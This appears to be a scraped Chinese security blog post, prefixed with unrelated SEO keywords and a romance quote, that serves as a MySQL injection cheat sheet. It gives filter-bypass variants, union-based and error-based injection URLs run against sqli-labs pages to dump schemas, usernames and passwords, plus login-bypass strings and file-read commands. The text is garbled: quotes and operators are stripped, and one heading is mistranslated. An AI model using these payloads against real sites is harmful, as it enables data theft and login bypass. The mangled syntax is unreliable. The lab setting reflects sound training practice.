济南商城网站建设公司,曲靖企业网站建设,专门为98k做的网站,微信营销定位她其实并不喜欢你#xff0c;只是在寂寞的时候#xff0c;你刚好撞上去#xff0c;刚好你对她好#xff0c;刚好你能入她眼#xff0c;刚好她来着不拒#xff0c;这所有都是刚好。。。---- 网易云热评一、MYSQL语句创建数据库create database test;选择要操作的数据库use…她其实并不喜欢你只是在寂寞的时候你刚好撞上去刚好你对她好刚好你能入她眼刚好她来着不拒这所有都是刚好。。。 ---- 网易云热评一、MYSQL语句创建数据库create database test;选择要操作的数据库user test创建表create table aiyou ( id int, username varchar(20), password varchar(30));向表中插入数据insert into aiyou values(1,admin,456);insert into aiyou values(2,boss,123);insert into aiyou values(3,ttt,123),(3,qqq,321);显示aiyou表中的所有记录select * from aiyou; 从aiyou表中查找满足条件id1的记录select * from aiyou where id1; 从aiyou表中查找满足条件id1的记录并只显示username和password字段内容select username,password from aiyou where id1;从aiyou表中查找同时满足条件id1以及username“admin”的记录select * from aiyou where id1 and usernameadmin;从aiyou表中查找同时满足条件id1或者username“boss”的记录select * from aiyou where id1 or usernameboss;drop database test;删除数据库drop table test;删除表格update aiyou set password111 where usernameboss 更新数据delete from aiyou where usernameboss; 删除数据select load_file(c:/111.txt); 读文件show databases; 显示当前数据库show tables显示选择的数据的所有表show create table aiyou G;显示表结构的详细数据describe 表名显示表结构大写可以自动补全select database(); 显示当前数据库select version() 显示数据库版本select user() 显示当前用户select now()显示当前时间select system_user();获取系统用户名select current_user();获取当前用户名select session_user();连接数据库的用户名select datadir; 读取数据库路径select basedirmysql安装路径select version_compile_os; 操作系统二、数据库连接$dbhost localhost; // mysql服务器主机地址 $dbuser root; // mysql用户名 $dbpass root; // mysql用户名密码 $conn mysqli_connect($dbhost, $dbuser, $dbpass); if(! $conn ) { die(Could not connect: . mysqli_error());} echo 数据库连接成功;mysqli_close($conn);?三、防注入绕过目标http://www.aiyou .com?id11、大小写绕过http://www.aiyou .com?id1 And 112、双写绕过http://www.aiyou .com?id1 aandnd 113、%00绕过http://www.aiyou .com?id1 a%00nd 11四、手工注入1、http://192.168.21.140/sqli/Less-2/index.php?id1 and 11 返回正常http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 返回错误说明存在注入2、判断列数http://192.168.21.140/sqli/Less-2/index.php?id1 order by 3 返回正常4返回返回错误说明存在三列3、联合查询http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 union select 1,2,3 将2或3输入我们想要查询的内容http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 union select 1,version(),database(),获取当前数据库及数据库版本4、获取表名http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemasecurity 获取security数据库下的表名5、获取列名http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers 获取users表下的列名6、获取字段内容http://192.168.21.140/sqli/Less-2/index.php?id1 and 12 union select 1,group_concat(username),group_concat(password) from users五、报错注入1、获取数据库用户http://192.168.21.137/sqli/Less-1/index.php?id1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --2、获取数据库名称http://192.168.21.137/sqli/Less-1/index.php?id1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --http://192.168.21.137/sqli/Less-1/index.php?id1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--3、获取当前数据库名称返回的是一个十六进制需要还原http://192.168.21.137/sqli/Less-1/index.php?id1 and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --4、获取表名http://192.168.21.137/sqli/Less-1/index.php?id1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schemadatabase() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --5、获取字段http://192.168.21.137/sqli/Less-1/index.php?id1and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema0x7365637572697479 and table_name0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --6、获取字段内容http://192.168.21.137/sqli/Less-1/index.php?id1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --六、后台绕过1、admin#2、admin or 11 #3、oror4、admin or 115、admin #七、获取网站的根沐浴露1、报错显示2、site:目标网站 warning3、遗留文件phpinfo4、漏洞爆路径5、读取配置文件禁止非法后果自负欢迎关注公众号web安全工具库
